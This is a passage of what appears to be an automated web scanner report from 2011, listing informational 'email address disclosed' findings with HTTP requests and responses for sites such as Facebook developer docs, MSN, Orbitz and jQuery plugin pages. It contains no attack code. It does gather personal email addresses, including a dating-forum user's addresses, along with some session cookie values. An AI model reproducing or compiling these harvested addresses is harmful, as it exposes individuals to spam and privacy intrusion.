The following email addresses were disclosed in the response:

PlatformPR@facebook.com
ap@facebook.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:20:04 GMT
Content-Length: 43193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<a href="mailto:PlatformPR@facebook.com">PlatformPR@facebook.com</a>
...[SNIP]...
<a href="mailto:ap@facebook.com">ap@facebook.com</a>
...[SNIP]...

21.174. http://developers.facebook.com/docs/opengraph previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/docs/opengraph

Issue detail

The following email address was disclosed in the response:

me@example.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:28 GMT
Content-Length: 31870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<code><html xmlns:og="http://ogp.me/ns#">
<head>
...
[REQUIRED TAGS]
<meta property="og:email" content="me@example.com"/>
<meta property="og:phone_number" content="650-123-4567"/>
<meta property="og:fax_number" content="+1-415-123-4567"/>
...
</head>
</code>
...[SNIP]...

21.175. http://dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Connection: close
Content-Type: text/html
Content-Length: 30282

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
               
...[SNIP]...
<a href="mailto:drew.diller@gmail.com">
...[SNIP]...
<a href="mailto:drew.diller@gmail.com">
...[SNIP]...

21.176. http://editorial.autos.msn.com/blogs/autosblog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/blogs/autosblog.aspx

Issue detail

The following email address was disclosed in the response:

autosblog@live.com

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.177. http://erncpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://erncpa.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@erncpa.com

Request

GET / HTTP/1.1
Host: erncpa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.178. https://faq.orbitz.com/app/answers/detail/a_id/15644 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://faq.orbitz.com
Path:	/app/answers/detail/a_id/15644

Issue detail

The following email address was disclosed in the response:

answer.feedback@orbitzworldwide.com

Request

GET /app/answers/detail/a_id/15644 HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.179. http://feeds.feedburner.com/omniture/blogs/all previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.feedburner.com
Path:	/omniture/blogs/all

Issue detail

The following email address was disclosed in the response:

raypun@adobe.com

Request

GET /omniture/blogs/all HTTP/1.1
Host: feeds.feedburner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/xml; charset=UTF-8
ETag: PaYroyZ/J6kfJnJlAl76xOOk6xg
Last-Modified: Wed, 02 Feb 2011 18:48:54 GMT
Date: Wed, 02 Feb 2011 19:20:33 GMT
Expires: Wed, 02 Feb 2011 19:20:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.co
...[SNIP]...
<a href="mailto:raypun@adobe.com"><span>raypun@adobe.com</span>
...[SNIP]...

21.180. http://forums.plentyoffish.com/datingposts6866122.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.plentyoffish.com
Path:	/datingposts6866122.aspx

Issue detail

The following email addresses were disclosed in the response:

zeromgn@msn.com
zeromgn@verizon.net

Request

GET /datingposts6866122.aspx HTTP/1.1
Host: forums.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 14:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bg3rbh553e25qi2e2vfojbvv; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>
           Login Issues. Free Dating, Singles and Personals </title>
               <META name="description" content="1.
...[SNIP]...
<span>New computer, have not been to re-enable zeromgn@verizon.net yet. Now have Vista in new computer and using windows internet explorer at the moment. I also had<br>zeromgn@msn.com which hasn't shown up yet. <br>
...[SNIP]...

21.181. http://gocitykids.parentsconnect.com/data/service-calendar.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gocitykids.parentsconnect.com
Path:	/data/service-calendar.json

Issue detail

The following email address was disclosed in the response:

programs@dragonfly.org

Request

GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275&_=1255386319932 HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en
Content-Type: text/json;charset=UTF-8
Content-Length: 20149
Date: Wed, 02 Feb 2011 19:20:46 GMT
Connection: close

jsonp1255386312275(
[{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"h
...[SNIP]...
<a href=mailto:programs@dragonfly.org target='_new'>
...[SNIP]...

21.182. http://golem.ph.utexas.edu/~distler/blog/atom10.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://golem.ph.utexas.edu
Path:	/~distler/blog/atom10.xml

Issue detail

The following email address was disclosed in the response:

distler@golem.ph.utexas.edu

Request

GET /~distler/blog/atom10.xml HTTP/1.1
Host: golem.ph.utexas.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 07:31:02 GMT
Server: Apache/2.3.6-dev (Unix) DAV/2 PHP/5.3.2 mod_fcgid/2.3.6-dev Phusion_Passenger/3.0.1 mod_ssl/2.3.6-dev OpenSSL/0.9.8l
Last-Modified: Thu, 18 Nov 2010 14:00:12 GMT
ETag: "b8e8e2-1e184-49554355e3300"
Accept-Ranges: bytes
Content-Length: 123268
Cache-Control: max-age=1800
Expires: Thu, 03 Feb 2011 08:01:02 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/atom+xml

<?xml version="1.0" encoding="iso-8859-1"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
<title>Musings</title>
<link rel="alternate" type="application/xhtml+xml" href="http://golem.ph
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...
<email>distler@golem.ph.utexas.edu</email>
...[SNIP]...

21.183. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The following email address was disclosed in the response:

janus.nos...@magma.ca

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:27 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=9a78c9779c82fa01:TM=1296574467:LM=1296574467:S=xKeU6xeEe_S8pKue; expires=Thu, 31-Jan-2013 15:34:27 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
<span dir=ltr>Janus janus.nos...@magma.ca sci med diseases osteoporosis John Allen wrote: Can </span>
...[SNIP]...

21.184. http://gsgd.co.uk/sandbox/jquery/easing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gsgd.co.uk
Path:	/sandbox/jquery/easing/

Issue detail

The following email address was disclosed in the response:

paypal@gsgd.co.uk

Request

GET /sandbox/jquery/easing/ HTTP/1.1
Host: gsgd.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.185. http://ie6funeral.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ie6funeral.com
Path:	/

Issue detail

The following email address was disclosed in the response:

ie6funeral@atendesigngroup.com

Request

GET / HTTP/1.1
Host: ie6funeral.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.186. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://johannburkard.de
Path:	/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

Issue detail

The following email address was disclosed in the response:

johann@johannburkard.de

Request

Response

HTTP/1.1 200 OK
Connection: close
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4C474270C78D978371F54CBF92957F65; Path=/
ETag: "84462d5d318033c5e14b0eb34b0de254"
Last-Modified: Wed, 10 Feb 2010 10:10:37 GMT
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 15:32:13 GMT
Content-Length: 26576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><!-- #BeginTemplate "/Templates/default.dwt"
...[SNIP]...
<a class="email" href="mailto:johann@johannburkard.de">johann@johannburkard.de</a>
...[SNIP]...

21.187. http://jquery.malsup.com/license.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.malsup.com
Path:	/license.html

Issue detail

The following email address was disclosed in the response:

malsup@malsup.com

Request

GET /license.html HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:14 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 04 May 2010 11:35:58 GMT
ETag: "1135030-41ff-485c31cf86380"
Accept-Ranges: bytes
Content-Length: 16895
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
<style type="text/css" media="screen">
body { font-family: tahoma; font-size: small; padding: 20px }
pre { margin: 20px 50px; padding: 20px; border: 1px solid #eee; backg
...[SNIP]...
<pre>
Copyright © 2010 Mike Alsup (malsup@malsup.com)

Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, inclu
...[SNIP]...

21.188. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 02 Feb 2011 15:32:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

21.189. http://lec.edu/fckeditor/editor/fckeditor.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lec.edu
Path:	/fckeditor/editor/fckeditor.php

Issue detail

The following email address was disclosed in the response:

webmaster@lec.edu

Request

GET /fckeditor/editor/fckeditor.php HTTP/1.1
Host: lec.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:32:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-1
Content-type: text/html

<html>
<head>
<title>Wizards of waverly place: the movie - Download HD/DVD/DivX/iPod Movie Online</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name
...[SNIP]...
<a href="http://www.lec.edu///mailto:webmaster@lec.edu">
...[SNIP]...

21.190. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:35:40 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1F55 V: 0
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:34:40 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: vv=900; HTTPOnly= ; domain=login.live.com;path=/
Set-Cookie: MSPRequ=lt=1296574540&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d45b8a78-d411-4c6c-85b3-f3727bec49d8; path=/;version=1
X-Frame-Options: deny
Content-Length: 11336



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

21.191. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:35:42 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1F53 V: 0
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:34:42 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: vv=900; HTTPOnly= ; domain=login.live.com;path=/
Set-Cookie: MSPRequ=lt=1296574542&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-1e5aa37a-c2ae-4da1-ac75-4375305bf99f; path=/;version=1
X-Frame-Options: deny
Content-Length: 11440



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

21.192. http://medienfreunde.com/lab/innerfade/js/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/js/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /lab/innerfade/js/jquery.innerfade.js HTTP/1.1
Host: medienfreunde.com
Proxy-Connection: keep-alive
Referer: http://medienfreunde.com/lab/innerfade/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:46:24 GMT
Server: Apache
Last-Modified: Thu, 14 Feb 2008 07:34:56 GMT
ETag: "74f6f-13be-4461953820800"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/x-js
Content-Length: 5054

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

21.193. http://mir.aculo.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mir.aculo.us
Path:	/

Issue detail

The following email address was disclosed in the response:

thomas@fesch.at

Request

GET / HTTP/1.1
Host: mir.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.194. http://mofones.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mofones.com
Path:	/

Issue detail

The following email address was disclosed in the response:

mofonesla@gmail.com

Request

GET / HTTP/1.1
Host: mofones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
X-Tumblr-User: morrisamaltz
Link: <http://26.media.tumblr.com/avatar_f6a355d02537_16.png>; rel=icon
Vary: Accept-Encoding
X-Tumblr-Usec: D=348333
Content-Type: text/html; charset=UTF-8
Content-Length: 81021
Date: Wed, 02 Feb 2011 19:29:24 GMT
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--

.
...[SNIP]...
<br />
Contact: mofonesla@gmail.com</div>
...[SNIP]...

21.195. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

Response

21.196. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

Response

21.197. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/in-praise-of-buried/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

Response

21.198. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

Response

21.199. http://pressroom.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pressroom.orbitz.com
Path:	/

Issue detail

The following email address was disclosed in the response:

bhoyt@orbitz.com

Request

GET / HTTP/1.1
Host: pressroom.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.200. https://publish.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/util/

Issue detail

The following email addresses were disclosed in the response:

abenigni@oscar.com
joe@foo.com

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:21:26 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 publish.omniture.com:88
X-Cache: MISS from publish.omniture.com
Connection: close
Content-Length: 2895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights reser
...[SNIP]...
<br />eg. joe@foo.com, abenigni@oscar.com
</td>
...[SNIP]...

21.201. http://scripts.omniture.com/javascript.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scripts.omniture.com
Path:	/javascript.js

Issue detail

The following email addresses were disclosed in the response:

brian@cherne.net
id@Ss.tc

Request

GET /javascript.js HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniture_unique=c4b47f0affb47cea2cd263f6285f016c; cms_site_lang=1; use207=7; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Wed, 02 Feb 2011 12:26:27 GMT
xserver: www6.dmz
Content-Type: text/javascript;charset=utf-8
Content-Length: 489753
Cache-Control: public, max-age=14400
Expires: Wed, 02 Feb 2011 19:39:24 GMT
Date: Wed, 02 Feb 2011 15:39:24 GMT
Connection: close

/* files/global/scripts/general/global.js */
/* files/global/scripts/general/validate_forms.js */
/* files/global/scripts/general/base64.js */
/* files/global/scripts/tracking/s_code_remote_current.js
...[SNIP]...
;@v=s.vs(sed)`5trk`F@v)#2=s.mr($0,(vt#Rt`Tvt)`n+s.hav()+q+(qs?qs:s.rq(^4)"
+"),0,id,ta);qs`i;`Ym('t')`5s.p_r)s.p_r(`V`b`i}^G(qs);^b`t(@u;`p@u`M^2,`H$H1',vb`G''`5#E)`I^z$x=`I^zeo=`I^z`X`q=`I^z`X^c`i`5!id@Ss.tc@1tc=1;s.flush`U()}`2#2`9tl`0o,t,n,vo`1;@X=$6o`V`X^c=t;s.`X`q=n;s."
+"t(@u}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$6o)`9wd^zgs`0u$R`L^t#51,#U`2s.t()`9wd^zdc`0u$R`L^t#5#U`2s.t()}}@A=(`I`P`g`8`4$4s@o0`Vd=^9;s
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.202. https://secure.avangate.com/order/nojs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/nojs.php

Issue detail

The following email address was disclosed in the response:

support@avangate.com

Request

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Thu, 03 Feb 2011 06:56:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="mailto:support@avangate.com">support@avangate.com</a>
...[SNIP]...

21.203. https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://si1.twimg.com
Path:	/a/1296609216/javascripts/lib/jquery.tipsy.min.js

Issue detail

The following email address was disclosed in the response:

jason@onehackoranother.com

Request

GET /a/1296609216/javascripts/lib/jquery.tipsy.min.js HTTP/1.1
Host: si1.twimg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2332
Content-Type: application/javascript
ETag: "48051f900fb80cc5b06e5a879f0588f2"
Expires: Wed, 18 May 2033 03:33:20 GMT
Last-Modified: Wed, 02 Feb 2011 01:16:42 GMT
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 2b00d66072e8d0301e1a9e1601f669a89bd9c4c739d34675eb53d49f93229401c0707b94ebe851de,d19d4dada4e21b9b869af2c3bf7da1ae173dbd16f0e705c42189f63885042e9ab299625cd51241dd
x-amz-id-2: bbdNSaHOK1f7aHMOo5EhCH0ZjTB6HqpxHR9V6AQWpSpfvK0t6Yms8WBrTI/i5YaR
x-amz-request-id: 5F4EB19F3B044BEB
X-Cache: Hit from cloudfront
Date: Wed, 02 Feb 2011 19:21:46 GMT
Connection: close

//Licensed under The MIT License
//Copyright (c) 2008 Jason Frame (jason@onehackoranother.com)
